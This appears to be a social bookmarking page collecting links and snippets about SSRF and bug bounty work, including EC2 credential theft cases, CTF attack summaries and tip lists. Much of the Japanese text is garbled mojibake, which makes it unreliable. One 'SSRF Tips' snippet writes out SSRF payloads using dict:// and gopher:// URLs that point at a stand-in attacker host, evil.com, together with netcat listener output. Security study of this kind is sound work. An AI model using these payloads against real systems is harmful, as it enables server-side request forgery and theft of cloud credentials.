Amazon EC2 ã«ãŠã‘ã‚‹ã‚»ã‚ュリティ(脆弱性)事例 - blog of morioka12
1. 始ã‚ã« ã“ã‚“ã«ã¡ã¯ã€morioka12 ã§ã™ã€‚ 本稿ã§ã¯ã€Amazon EC2 上ã§å‹•ã Web アプリケーションã®è„†å¼±æ€§ã«ã‚ˆã£ã¦è„†å¼±æ€§æ”»æ’ƒãŒå¯èƒ½ã ã£ãŸå®Ÿéš›ã®äº‹ä¾‹ã«ã¤ã„ã¦ç´¹ä»‹ã—ã¾ã™ã€‚ 1. 始ã‚ã« 2. Amazon EC2 ã«ãŠã‘ã‚‹ã‚»ã‚ュリティリスク Amazon EBS 被害ãŒã‚ã£ãŸå…¬é–‹äº‹ä¾‹ 3. Amazon EC2 ã§èµ·ã“ã‚Šã†ã‚‹è„†å¼±æ€§æ”»æ’ƒ SSRF ãŒå¯èƒ½ãªè„†å¼±æ€§ SSRF ã«ãŠã‘る回é¿æ–¹æ³• 4. Amazon EC2 ã®è„†å¼±ãªå ±å‘Šäº‹ä¾‹ ç”»åƒèªã¿è¾¼ã¿æ©Ÿèƒ½ã«æ½œã‚€ SSRF を悪用ã—㟠EC2 ã®ã‚¯ãƒ¬ãƒ‡ãƒ³ã‚·ãƒ£ãƒ«ã®ä¸æ£å…¥æ‰‹ãŒå¯èƒ½ SAML アプリケーションã«æ½œã‚€ SSRF を悪用ã—㟠EC2 ã®ã‚¯ãƒ¬ãƒ‡ãƒ³ã‚·ãƒ£ãƒ«ã®ä¸æ£å…¥æ‰‹ãŒå¯èƒ½ Webhook 機能ã«æ½œã‚€ SSRF を悪用ã—㟠EC2 ã®ã‚¯ãƒ¬ãƒ‡ãƒ³ã‚·ãƒ£ãƒ«ã®ä¸æ£å…¥æ‰‹ãŒå¯èƒ½ Webhook 機能ã«æ½œã‚€ SSRF を悪用ã—㟠EC2 ã®ã‚¯ãƒ¬ãƒ‡
ã€2020年】CTF Webå•é¡Œã®æ”»æ’ƒæ‰‹æ³•ã¾ã¨ã‚ - ã“ã‚“ã¨ã‚ーるã—ーã“ã‚“ã¨ã‚ーるã¶ã„
ã¯ã˜ã‚㫠対象イベント èªã¿æ–¹ã€ä½¿ã„æ–¹ Remote Code Execution(RCE) 親ディレクトリ指定ã«ã‚ˆã‚‹open_basedirã®ãƒã‚¤ãƒ‘ス PHP-FPMã®TCPソケット接続ã«ã‚ˆã‚‹open_basedirã¨disable_functionsã®ãƒã‚¤ãƒ‘ス Javaã®Runtime.execã§ã‚·ã‚§ãƒ«ã‚’実行 Cross-Site Scripting(XSS) nginx環境ã§HTTPステータスコードãŒæ“作ã§ãã‚‹å ´åˆã«CSPヘッダーを無効化 Googleã®ClosureLibraryサニタイザーã®XSS脆弱性 Webã®Proxy機能を介ã—ãŸService Workerã®ç™»éŒ² 括弧を使ã‚ãªã„XSS /記å·ã‚’使用ã›ãšã«é·ç§»å…ˆURLを指定 SOME(Same Origin Method Execution)を利用ã—ã¦document.writeã‚’é †æ¬¡å®Ÿè¡Œ SQL Injection MySQ
Introduction | Book of BugBounty Tips
Hi , This book is a collection of "BugBounty" Tips tweeted / shared by community people. It includes the tweets I collected over the past from Twitter , Google and Hastags and chances that few tips may be missing. I have categorized tips against each vulnerability classification and "will be updating" regularly. Each tweet has link to original tweet to read about others replies / comments. Huge "T
サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ã®å°Žå…¥ã‹ã‚‰ç”Ÿã˜ã‚‹SSRF | ã‚»ã‚ュリティブãƒã‚° | 脆弱性診æ–(セã‚ュリティ診æ–)ã®GMOサイãƒãƒ¼ã‚»ã‚ュリティ byイエラエ
オフェンシブセã‚ュリティ部ã®å±±å´Žã§ã™ã€‚サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆSSR)ã®å°Žå…¥ã«ã‚ˆã£ã¦SSRFãŒç™ºç”Ÿã™ã‚‹å•é¡Œã‚’見ã¤ã‘る機会ãŒã‚ã£ãŸãŸã‚ã€æœ¬è¨˜äº‹ã§ã¯å®Ÿä¾‹ã‚’交ãˆãªãŒã‚‰ç´¹ä»‹ã—ãŸã„ã¨æ€ã„ã¾ã™ã€‚ サーãƒã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆSSR)ã¨ã¯ï¼Ÿ 本記事ã§æ‰±ã†SSRã¨ã¯ã€Œã‚µãƒ¼ãƒä¸Šã§HTMLを出力ã™ã‚‹ã“ã¨ã€ã‚’指ã—ã¦ã„ã¾ã™ã€‚ãŸã ã—erbã‚„jspã®ã‚ˆã†ãªãƒ†ãƒ³ãƒ—レートã‹ã‚‰HTMLを出力ã™ã‚‹ã®ã¨ã¯ç•°ãªã‚Šã€ä¸€èˆ¬çš„ã«ã¯ä»¥ä¸‹ã®ã‚ˆã†ã«ã‚¯ãƒ©ã‚¤ã‚¢ãƒ³ãƒˆã‚µã‚¤ãƒ‰ãƒ¬ãƒ³ãƒ€ãƒªãƒ³ã‚°ï¼ˆCSR)ã®æ–‡è„ˆã§ä½¿ã‚れるã“ã¨ãŒä¸»ã§ã™ã€‚ è¿‘å¹´ã®Vue.jsã‚„Reactを代表ã™ã‚‹ã‚ˆã†ãªWebフãƒãƒ³ãƒˆã‚¨ãƒ³ãƒ‰ãƒ•ãƒ¬ãƒ¼ãƒ ワークã¯ãƒ–ラウザ上ã§å‹•çš„ã«DOMツリーを構築ã—ã¦ç”»é¢ã‚’æ画(CSR)ã™ã‚‹ã®ãŒä¸»æµã¨ãªã£ã¦ã„ã¾ã™ã€‚ã“ã‚Œã«ã‚ˆã£ã¦ãƒšãƒ¼ã‚¸é·ç§»ã‚’挟ã¾ãšãƒ¦ãƒ¼ã‚¶ä½“験ã®ã‚ˆã„シングルページアプリケーション(SPA)ãŒä½œã‚‹ã“ã¨ãŒã§ãã‚‹ã¨ã„ã†ãƒ¡ãƒªãƒƒãƒˆãŒã‚ã‚Šã¾ã™ã€‚ ãŸã ã€å˜ç´”ãªSPAã«ã¯ãƒ‡ãƒ¡
SSRF Tips
http://safebuff.com/ssrf.php?dict://attacker:11111/ evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 // http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php <?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?> evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Conne
How I made $31500 by submitting a bug to Facebook
Hello World â¤ï¸, Facebook is the largest social networking site in the world and one of the most widely used. I have always been interested in testing the security of Facebook. During the sub domain enumeration, I’ve got a sub domain which is “https://m-nexus.thefacebook.com/". It redirects me to “https://m-nexus.thefacebook.com/servlet/mstrWebAdmin" observe below screenshot: I quickly Google keywo
1
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
GitHub - ReAbout/web-sec: WEB安全手册(çº¢é˜Ÿå®‰å…¨æŠ€èƒ½æ ˆ),æ¼æ´žç†è§£ï¼Œæ¼æ´žåˆ©ç”¨ï¼Œä»£ç 审计和渗é€æµ‹è¯•æ€»ç»“。ã€æŒç»æ›´æ–°ã€‘
6379 - Pentesting Redis | HackTricks
BugBountyHunting.com - A community-curated Resource for Bug Bounty Hunting
GitHub - twseptian/oneliner-bugbounty: oneliner commands for bug bounties
GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bug bounties
GitHub - chennqqi/godnslog: An exquisite dns&http log server for verify SSRF/XXE/RFI/RCE vulnerability
XXXX
GitHub - 1ndianl33t/Gf-Patterns: GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
GitHub - ksharinarayanan/SSRFire: An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects
CheatSheetSeries/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.md at master · OWASP/CheatSheetSeries
Penetration Testing | Hacking
GitHub - welefen/ssrf-agent: make http(s) request to prevent SSRF
{{#tags}}- {{label}}
{{/tags}}